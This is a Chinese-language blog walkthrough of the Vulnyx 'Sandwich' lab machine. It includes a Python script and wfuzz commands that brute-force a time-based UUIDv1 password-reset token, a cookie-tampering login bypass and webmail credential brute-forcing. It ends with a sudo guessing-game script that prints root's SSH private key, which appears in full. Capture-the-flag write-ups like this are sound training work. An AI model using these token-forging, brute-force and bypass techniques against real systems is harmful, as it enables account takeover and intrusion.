Pepster'Blog
Vulnyx-Sandwich-Walkthrough
城南花已开 Lv6
  2025-03-31 22:15:36   2025-04-10 15:36:21    4.1k 字  21 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.131  08:00:27:81:b7:98       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:6f:4b       VMware, Inc.
^C
export ip=192.168.60.131
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.131:22
Open 192.168.60.131:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 22:18 CST
Initiating ARP Ping Scan at 22:18
Scanning 192.168.60.131 [1 port]
Completed ARP Ping Scan at 22:18, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:18
Completed Parallel DNS resolution of 1 host. at 22:18, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:18
Scanning 192.168.60.131 [2 ports]
Discovered open port 22/tcp on 192.168.60.131
Discovered open port 80/tcp on 192.168.60.131
Completed SYN Stealth Scan at 22:18, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.131
Host is up, received arp-response (0.00070s latency).
Scanned at 2025-03-31 22:18:08 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:81:B7:98 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

发现80端口开放,浏览器访问一下,编辑hosts,添加域名

1
2
echo "$ip sandwich.nyx"|sudo tee -a /etc/hosts
192.168.60.131 sandwich.nyx

扫一下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 7845]
/download.php         (Status: 200) [Size: 58]
/img                  (Status: 301) [Size: 314] [--> http://192.168.60.131/img/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.60.131/vendor/]
/config.php           (Status: 200) [Size: 0]
/resetpassword.php    (Status: 200) [Size: 361]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

经过尝试得知存在名为admin的用户

image

枚举子域名

模糊测试一下子域名

发现一个webmail.sandwich.nyx

再次编辑hosts文件添加域名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ wfuzz -c -u "http://sandwich.nyx" -H "HOST:FUZZ.sandwich.nyx" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sandwich.nyx/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


000000005:   302        0 L      0 W        0 Ch        "webmail - webmail"

访问后可以尝试注册账户

可以发送消息,不过没啥用

image

同时在sandwich.nyx中可以利用在webmail子域名下注册的邮箱进行再次注册

image

伪造Token碰撞

然后利用其忘记密码的功能,系统会自动发送邮件到刚才注册的账户信箱上

image

而且我们可以得知此重置密码的功能是利用token,来识别重置哪个用户的密码

我们仔细观察此token的规律,则会发现只有前面两位会变化,后面基本上都固定不变的

-11f0-8069-08002781b798

经过不断测试和拷打GPT后得出,前面大概率是根据时间戳来变化的

因为我们不仅可以发送我们已知账户的重置请求,还可以发送admin账户的重置请求

因此设想是根据admin用户发送的时间戳来构造一个属于他的token

然而我并没有成功,思路太局限了,时间戳是根据纳秒的,基本上很难构造出来完全一模一样并且正确的token

经过群友He110word提供的思路夹逼定理🤣,成功秒杀,哈哈哈

image

具体就是通过发送三个POST数据包来模糊测试admin用户的token

第一次和最后一次都发送已知用户的重置请求,中间发送admin用户的重置请求,根据两次已知用户请求中token值来枚举出中间时间可能出现的所有token,这样即可爆破得到admin的重置密码的token

贴出具体exp

修改已知账户的eamil即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import requests
import time

# 目标 URL
url = 'http://sandwich.nyx/index.php'

# 第一个已知账户的重置请求数据
data1 = {
    'email': '[email protected]',
    'reset_action': '1'
}

# admin 账户的重置请求数据
data2 = {
    'email': '[email protected]',
    'reset_action': '1'
}

# 已知账户的 PHPSESSID
cookies1 = {'PHPSESSID': 'v4pjv1gnnhcsb26pb5khej5uh8'}

# 伪造的 PHPSESSID
cookies2 = {'PHPSESSID': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaa'}

# 记录时间戳(单位:纳秒)
timestamps_ns = []

# 用于每次请求的数据和cookies
requests_data = [
    (data1, cookies1),  # 第一次请求
    (data2, cookies2),  # 第二次请求(admin)
    (data1, cookies1)   # 第三次请求
]

for i, (data, cookies) in enumerate(requests_data):
    start_time_ns = time.perf_counter_ns()  # 记录当前时间(纳秒级)
    response = requests.post(url, data=data, cookies=cookies)  # 发送请求
    end_time_ns = time.perf_counter_ns()  # 记录请求结束时间

    timestamps_ns.append(end_time_ns)  # 存储时间戳
    response_text = response.text.strip()

    # 判断是否成功
    success = "Password reset link has been sent to your email." in response_text
    status_message = "重置成功" if success else "重置失败"

    print(f"第 {i+1} 次请求:")
    print(f"  发送时间: {start_time_ns} 纳秒")
    print(f"  服务器响应时间: {end_time_ns} 纳秒")
    print(f"  响应状态码: {response.status_code}")
    print(f"  结果: {status_message}\n")

# 计算时间差
if len(timestamps_ns) == 3:
    delta_1_ns = timestamps_ns[1] - timestamps_ns[0]
    delta_2_ns = timestamps_ns[2] - timestamps_ns[1]
    print(f"第 1 次和第 2 次请求时间间隔: {delta_1_ns} 纳秒")
    print(f"第 2 次和第 3 次请求时间间隔: {delta_2_ns} 纳秒")%

尝试执行一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ python3 1.py
第 1 次请求:
  发送时间: 3520987923174 纳秒
  服务器响应时间: 3521032465004 纳秒
  响应状态码: 200
  结果: 重置成功

第 2 次请求:
  发送时间: 3521032547314 纳秒
  服务器响应时间: 3521039455429 纳秒
  响应状态码: 200
  结果: 重置成功

第 3 次请求:
  发送时间: 3521039517704 纳秒
  服务器响应时间: 3521050711911 纳秒
  响应状态码: 200
  结果: 重置成功

第 1 次和第 2 次请求时间间隔: 6990425 纳秒
第 2 次和第 3 次请求时间间隔: 11256482 纳秒

image

因为请求速度过快的原因,可能存在其中一个token是无效的

但不妨碍我们已经获得了admin用户的token时间戳区间了

我们可以再次利用GPT写一个解析时间的脚本,可以帮助我们更好的理解哪个token请求时间在前

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import uuid
import datetime

def parse_uuid_v1(uuid_str):
    """ 解析 UUID v1,提取时间戳 """
    token = uuid.UUID(uuid_str)

    # 解析 UUID v1 的时间戳
    timestamp = (token.time - 0x01b21dd213814000) / 1e7  # 转换为秒

    # 转换为可读时间格式(UTC 时间)
    datetime_parsed = datetime.datetime.utcfromtimestamp(timestamp)

    return datetime_parsed

# 测试解析生成的 UUID
uuid_str = input("请输入要解析的 UUID: ").strip()
decoded_time = parse_uuid_v1(uuid_str)

print(f"解析的 UTC 时间: {decoded_time}")%

执行一下

1
2
3
4
5
6
❯ python3 c.py
请输入要解析的 UUID: a9b8c69e-12ca-11f0-8069-08002781b798
解析的 UTC 时间: 2025-04-06 09:36:48.863811
❯ python3 c.py
请输入要解析的 UUID: a9b619a8-12ca-11f0-8069-08002781b798
解析的 UTC 时间: 2025-04-06 09:36:48.846276

让GPT生成token字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def generate_all_uuids_between(uuid1, uuid2):
    # 解析 UUID 前缀部分
    uuid1_prefix = int(uuid1.split('-')[0], 16)
    uuid2_prefix = int(uuid2.split('-')[0], 16)
    dynamic_part = uuid1.split('-')[1]
    # 检查 uuid1_prefix 是否小于 uuid2_prefix
    if uuid1_prefix > uuid2_prefix:
        raise ValueError("The first UUID must be smaller than the second UUID")

    # 生成所有可能的 UUID 前缀
    uuids = {}
    for current_prefix in range(uuid1_prefix, uuid2_prefix + 1):
        # 将当前前缀转换为十六进制
        current_prefix_hex = hex(current_prefix)[2:]
        # 构造当前前缀的 UUID
        current_uuid = f'{current_prefix_hex}-{dynamic_part}-11f0-8069-08002781b798'
        uuids[current_prefix] = current_uuid

    return uuids

# 提供的 UUID
uuid1 = 'a9b619a8-12ca-11f0-8069-08002781b798'
uuid2 = 'a9b8c69e-12ca-11f0-8069-08002781b798'

# 生成并打印两个 UUID 之间的所有 UUID
uuids_dict = generate_all_uuids_between(uuid1, uuid2)
for prefix, uuid in uuids_dict.items():
    print(f"{uuid}"

输出到dic.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ python3 2.py>dic.txt
head dic.txt
a9b619a8-12ca-11f0-8069-08002781b798
a9b619a9-12ca-11f0-8069-08002781b798
a9b619aa-12ca-11f0-8069-08002781b798
a9b619ab-12ca-11f0-8069-08002781b798
a9b619ac-12ca-11f0-8069-08002781b798
a9b619ad-12ca-11f0-8069-08002781b798
a9b619ae-12ca-11f0-8069-08002781b798
a9b619af-12ca-11f0-8069-08002781b798
a9b619b0-12ca-11f0-8069-08002781b798
a9b619b1-12ca-11f0-8069-08002781b798
wc -l dic.txt
175351 dic.txt

虽然字典挺大的,但wfuzz模糊测试也挺快的

我们将admin用户的密码重置为abc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ wfuzz -c -u "http://sandwich.nyx/resetpassword.php" -d "token=FUZZ&new_password=abc&confirm_password=abc" -H "User-Agent:Mozilla/5.0" -w dic.txt --hw 36
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sandwich.nyx/resetpassword.php
Total requests: 175351

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000105281:   200        15 L     41 W       408 Ch      "a9b7b4e8-12ca-11f0-8069-08002781b798"
000175351:   200        15 L     41 W       408 Ch      "a9b8c69e-12ca-11f0-8069-08002781b798"

Total time: 281.8470
Processed Requests: 175351
Filtered Requests: 175349
Requests/sec.: 622.1493

利用此密码进行登录

image

在这里He110word提供了一个Bug方案,即你在登录的时候勾选remember me

image

然后进行抓包得到Cookie中包含用户名

image

删除前面的PHPSESSID,并将remember_meemail=后面的值改为[email protected]放行即可

这样也能实现登录admin用户

image

得到一个CSV文件,其中包含五个用户的邮件名

image

我们进行文本处理一下

尝试利用此用户进行爆破webmail服务

1
2
3
4
5
6
cat user.txt
ll104567_9q
suraxddq_tw
xerosec_w5
j4ckie_x5
matthygd_x

可能要跑好一会,稍微等一下就行了,我是因为正确用户在最下面所以直接全部跑完了

只看302跳转的即可

得到用户凭证matthygd_x:qweasd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ wfuzz -c -u "http://webmail.sandwich.nyx/login.php" -d "email=FUZZ%40sandwich.nyx&password=FUZ2Z" -H "User-Agent:Mozilla/5.0" -w user.txt -w 5000.txt --hw 59
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://webmail.sandwich.nyx/login.php
Total requests: 25000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000004752:   200        30 L     58 W       849 Ch      "ll104567_9q"
000009752:   200        30 L     58 W       849 Ch      "suraxddq_tw"
000014752:   200        30 L     58 W       849 Ch      "xerosec_w5"
000019752:   200        30 L     58 W       849 Ch      "j4ckie_x5"
000022901:   302        0 L      0 W        0 Ch        "matthygd_x - qweasd"
000024752:   200        30 L     58 W       849 Ch      "matthygd_x"

Total time: 1461.657
Processed Requests: 25000
Filtered Requests: 24994
Requests/sec.: 17.10387

用户提权

从信箱中得到ssh连接密钥

matthygd_xy:tGCD9XIP03IHpSCDdoRu

image

尝试连接一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ ssh matthygd_xy@$ip
The authenticity of host '192.168.60.131 (192.168.60.131)' can't be established.
ED25519 key fingerprint is SHA256:c8erXE4AHVkShqJ2nmaoh+8C3ZBq0gRr5iBxLnGVt9k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.131' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 19:35:02 2025 from 192.168.1.181
matthygd_xy@sandwich:~$ cat user.txt
c158efefab9bfd356fa8e9ec3c440da1

chvt 切换终端

用户有sudo权限可以执行chvt

1
2
3
4
5
6
matthygd_xy@sandwich:~$ sudo -l
Matching Defaults entries for matthygd_xy on sandwich:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User matthygd_xy may run the following commands on sandwich:
    (root) NOPASSWD: /bin/chvt

在Linux系统中,虚拟控制台(VTs)是一种允许多个用户或任务同时访问系统的机制。每个VT都是一个独立的终端会话,可以在其中运行不同的命令和程序。

在常见的 Linux 桌面系统中,使用快捷键切换虚拟终端的方式是:

  • Ctrl + Alt + F1Ctrl + Alt + F12:切换到 /dev/tty1/dev/tty12
    • 例如:Ctrl + Alt + F2 → 切换到 /dev/tty2
  • Ctrl + Alt + F7F1(取决于发行版)通常回到图形界面(X 或 Wayland 会话)

chvt命令允许用户直接从一个VT切换到另一个VT,而无需使用快捷键。

简单来说就是切换tty的

并且机器内还存在其他用户 ll104567

1
2
3
4
5
6
matthygd_xy@sandwich:~$ ls -al /home/
total 16
drwxr-xr-x  4 root        root        4096 mar 23 23:40 .
drwxr-xr-x 18 root        root        4096 mar 22 23:05 ..
drwx------  3 ll104567    ll104567    4096 mar 30 20:04 ll104567
drwx------  2 matthygd_xy matthygd_xy 4096 mar 30 20:05 matthygd_xy

我们利用find查看隶属于 ll104567用户的文件

发现tty20属于此用户的

1
2
3
4
matthygd_xy@sandwich:~$ find / -user  ll104567 2>/dev/null |grep -Pv 'proc|sys'
/run/user/1001
/dev/tty20
/home/ll104567

尝试利用chvt切换一下

虽然说切换过来了,但用户还是不变的

1
2
3
matthygd_xy@sandwich:~$ sudo /bin/chvt 20
matthygd_xy@sandwich:~$ id
uid=1000(matthygd_xy) gid=1000(matthygd_xy) grupos=1000(matthygd_xy),100(users)

其实确实是已经切换到tty20中了

你要回到虚拟机中

image

这就类似于你按了快捷键ctrl + alt +f20只不过没有办法通过快捷键实现切换

在虚拟机中反弹shell到kali

Root提权

监听端口

发现拥有sudo可以运行opt/game.sh脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ pwncat-cs -lp 4444
[18:49:05] Welcome to pwncat 🐈!                           __main__.py:164
[18:49:06] received connection from 192.168.60.131:45340        bind.py:84
[18:49:06] 0.0.0.0:4444: normalizing shell path             manager.py:957
[18:49:07] 192.168.60.131:45340: registered new host w/ db  manager.py:957
(local) pwncat$                                                      

(remote) ll104567@sandwich:/home/ll104567$ sudo -l
Matching Defaults entries for ll104567 on sandwich:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User ll104567 may run the following commands on sandwich:
    (ALL) NOPASSWD: /opt/game.sh

我们仔细查看一下脚本内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
(remote) ll104567@sandwich:/home/ll104567$ cat /opt/game.sh
#!/bin/bash

export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

MAX=2000000

ATTEMPTS=$(/usr/bin/awk -v max="$MAX" 'BEGIN {printf "%d", (log(max)/log(2) + 0.999999)}')

/bin/echo "Hello! What is your name?"
read NAME

NUMBER=$(( ( RANDOM % MAX ) + 1 ))

/bin/echo "Well, $NAME, I'm thinking of a number between 1 and $MAX."
/bin/echo "You have $ATTEMPTS attempts to guess it."

ATTEMPTS_MADE=0

SECRET_FILE="/root/.ssh/id_rsa"

while [ $ATTEMPTS_MADE -lt $ATTEMPTS ]; do
  /bin/echo "Try to guess:"
  read GUESS

  # Validate that the input is a valid number
  if ! [[ "$GUESS" =~ ^[0-9]+$ ]]; then
    /bin/echo "Please, enter a valid number."
    continue
  fi

  ATTEMPTS_MADE=$((ATTEMPTS_MADE + 1))

  if [ $GUESS -lt $NUMBER ]; then
    /bin/echo "Your guess is too low."
  elif [ $GUESS -gt $NUMBER ]; then
    /bin/echo "Your guess is too high."
  else
    break
  fi
done

if [ $GUESS -eq $NUMBER ]; then
  /bin/echo "Good job, $NAME! You guessed my number in $ATTEMPTS_MADE attempts!"
  /bin/echo "Here's your reward:"
  /bin/cat "$SECRET_FILE"
else
  /bin/echo "No, the number I was thinking of was $NUMBER."
fi

发现实际上是个猜数字的小游戏

你一共有21次猜测机会

其实很简单,利用二分法枚举即可,这样每猜一次,就能把可能的范围缩小一半

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
(remote) ll104567@sandwich:/home/ll104567$ sudo /opt/game.sh
Hello! What is your name?
aaa
Well, aaa, I'm thinking of a number between 1 and 2000000.
You have 21 attempts to guess it.
Try to guess:
Your guess is too high.
Try to guess:
8280
Your guess is too low.
Try to guess:
8295
Your guess is too high.
Try to guess:
8287
Your guess is too low.
Try to guess:
8290
Your guess is too low.
Try to guess:
8292
Your guess is too high.
Try to guess:
8291
Good job, aaa! You guessed my number in 21 attempts!
Here's your reward:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEAzMoVFzc2RXwrRJ6QA2Kr/trjNxtTpuvKn10uYGmFNcmPfACQfR0H
BBWQUY8LvVg+5UGGEyuC1Kvv9hevyemqVMm5+Xe9D+BCHQoqXoa7VeEd+As736w9+Ly1/D
z0ovVAA1Ae8eRJsHzXHLFcgXflpOh2mdH7hAnzr3sbDFSnUT7VOy86ODMm1PFfC6ec5BjU
z5iQjdHGOpOOTxvAsMIQeZWCgR1/hrnB1LgT82eKakFerk1V1bJTGCqDpOeaVY/oOwTXIX
gLOQ/jFzExmTy7H8PpOsr4QdkKdpLaerCE3Mz56muJKxcI30jgSXficKTgPh9dbbgSm+6U
5idrOsVHhs72xLGQZFpLD88MZhGK92WN5KPrHAIltpm6Jn8wy+znOwdeenLe9XGqCBuk/f
rjbEGtBwCjgM0s9l/4chymXNIMfB84PXHbZIQKpMx2cwjni8CQ9n7yJWxVzNcxQPO6Ft9h
cxWVwiGYqsAJEiQUjgRH5amveLLvpeccI+NqbEMsxn/T+GA1pKUvmvI9qUNK30T5HxGzGm
3mEfcXqL+EGmzTuiMFKRdLLcqp455WG+uKduDZbzRDmbEC4GKAKg5qIwe+YXw1wYzb6uEx
2Lx9QHdMiKYpEg+uEJF3jpr+i7YJ4rDX3/dwMQs+r26NxmC12wSKrqkUIYRZeo+KBxm+LD
0AAAdIn9Yut5/WLrcAAAAHc3NoLXJzYQAAAgEAzMoVFzc2RXwrRJ6QA2Kr/trjNxtTpuvK
n10uYGmFNcmPfACQfR0HBBWQUY8LvVg+5UGGEyuC1Kvv9hevyemqVMm5+Xe9D+BCHQoqXo
a7VeEd+As736w9+Ly1/Dz0ovVAA1Ae8eRJsHzXHLFcgXflpOh2mdH7hAnzr3sbDFSnUT7V
Oy86ODMm1PFfC6ec5BjUz5iQjdHGOpOOTxvAsMIQeZWCgR1/hrnB1LgT82eKakFerk1V1b
JTGCqDpOeaVY/oOwTXIXgLOQ/jFzExmTy7H8PpOsr4QdkKdpLaerCE3Mz56muJKxcI30jg
SXficKTgPh9dbbgSm+6U5idrOsVHhs72xLGQZFpLD88MZhGK92WN5KPrHAIltpm6Jn8wy+
znOwdeenLe9XGqCBuk/frjbEGtBwCjgM0s9l/4chymXNIMfB84PXHbZIQKpMx2cwjni8CQ
9n7yJWxVzNcxQPO6Ft9hcxWVwiGYqsAJEiQUjgRH5amveLLvpeccI+NqbEMsxn/T+GA1pK
UvmvI9qUNK30T5HxGzGm3mEfcXqL+EGmzTuiMFKRdLLcqp455WG+uKduDZbzRDmbEC4GKA
Kg5qIwe+YXw1wYzb6uEx2Lx9QHdMiKYpEg+uEJF3jpr+i7YJ4rDX3/dwMQs+r26NxmC12w
SKrqkUIYRZeo+KBxm+LD0AAAADAQABAAACABTh6HD+bs4lbBi/syoSi5Jd31Hfu1HSn833
XQLKJSIdJGtTIr4MpzSp6ZZU0rAjSaqWr2V7XYhyjfIXa+lYJp0lwuKRl1mr7GH0sZRZAy
JYkHXvg1Klct5PM/QoLRQEPoZNSxKEd7qDncCDGiPo8NBg6gh5FT+GGkTDILjLAGge/Z8J
i6jDwopv9dlaOqaMclWcQOVNRlGeeUz6JKssPCzXFkCJ8avwe4zwRmHe0DT8kdCOpJmOvm
gWRxKaPAPMkbRETpb5nD9cg4jPueHeg6r+DxAxNqEppiZS3EIq3NQnzLY0R/+jsNe/9oBX
YA5M1GxRRiApkdriYxRDDG1Tmkg8q7LeAnx4EGFCJJigVIFjVnQ9GNADzx0rNQtFfNVDdM
/ORCD4s0PzGh5rrxtjl3JeWMR5R1Q4e423HODTNo0k6arLOTcQyMiDrV4Oxgl1AbEKvkyB
ya1Rin+wy3UnsYR6K2gkrDQ8dzGyw2tAIg8cpKZDeJQi6t3uQw/miQDkPcLBC0dyuP7Hjr
wPvh87Z5FcHfFQyx7A+sy87H79Fv4vGJGUyLNeczf2cpje83ISLgCenxZmoAiZw9ubgoqU
8O0FDDLAMja/O9f2ULatRHYeVkew/A36+JJyLrwjkL9oIbYZSSsNm7kr80SbvC06pxMsT2
gsHksMsMqfjlEEjl+bAAABAQC441IN9GF2S8t2GzwMQtrf+DuaAqUuBHsdQ1oL4Z+oXxXV
81nEB2tpzNcoFXdr5YCJoa7wqcsHWJ17efSn75V5eKupQcw5R3qFObUoWOHwXqHMr3MAj5
nupQo7YqWmXVYZU6qqob6BSWK7QGSMhH3lTOpr0Tmzyj+VeUJ5jpTH8yupsbYdvoufPb4w
a917NJxEatNyH/Pb1+qF9ZaK/QkYEuWO63pIBnQsrwIPWzG3XhLQvUsyKuzaqt/GaidY6o
sBV4e/57CPx4/2orOPIUkJrojO39st9suBnBhWv0RB4CYeiFOFqJHg4lAHc89uh7/1FhfJ
qH8/93WDPQzLb1EnAAABAQDmOx0PEyd1L50bZcf/yBPTgu/E3hhJsn2EkjKNciQvf0XMqo
bp3xB7eSMtB2tPmlsJdKQ0pmuX1b5/Mxf5377cLVHtGefkqPH1irZMIUupJJybwQDvv1TE
I7nS3nsGgro0LxFegq4lNK/J0hOxdr0AzYCA0V1URBAc7F1yeIVsfw5agUBctTIETh4vb2
qbXz8zkaUCs3OxD+29tm759C9VV06EghvPGsNLQCNxhUJQADl+alhof4JLgaNsGSAjD0+E
BbrBjxfJ/Thc+/TRnUgi02VXBvEN3lEPPSykgnkrH05sJy3bkkypcSzrhu56I8xH2JNktD
KI7CKEYAOb49G7AAABAQDjtfviGpDjQvFu/a3ftuJTO0jOfMi0KUC4D8gtX0RuLX9kx4en
99te7snBHk667wwOWg1Obo4OKuVQPbI9GpxfP8ExnSBCj7ul6pHTGrHYoKDXFkGE38LdTx
vMEEyqhFiqNIv9iJUMfrZf4WcOWTl+rtJus3xz8yEjxJ+8CXNb3DSGD2AN2my4gmXuSJec
Q3j0qy5I0191AjSaySmfOvFTdXk/2CHq2BiPDyrvZBoJC1/Uo34IJzv7KniWETOn1pXQyW
5e4Z60iiIePJTiXy32FP1CkMfFCqrnCf6vUh7u5/cogU9EFCFxfEcAagP0OMU3pu8stWpw
r1QiwDaFhL5nAAAADXJvb3RAc2FuZHdpY2gBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

尝试连接一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
(remote) ll104567@sandwich:/home/ll104567$ vi id_rsa
(remote) ll104567@sandwich:/home/ll104567$ chmod 600 id_rsa
(remote) ll104567@sandwich:/home/ll104567$ ssh [email protected] -i id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:c8erXE4AHVkShqJ2nmaoh+8C3ZBq0gRr5iBxLnGVt9k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ED25519) to the list of known hosts.
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 20:14:35 2025 from 192.168.1.181
root@sandwich:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@sandwich:~# cat root.txt
a4e728e6ffc502beea7570a75348af44
  1. 信息收集
    1. 服务探测
    2. 枚举子域名
    3. 伪造Token碰撞
  2. 用户提权
    1. chvt 切换终端
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 485.2k
  1. 信息收集
    1. 服务探测
    2. 枚举子域名
    3. 伪造Token碰撞
  2. 用户提权
    1. chvt 切换终端
  3. Root提权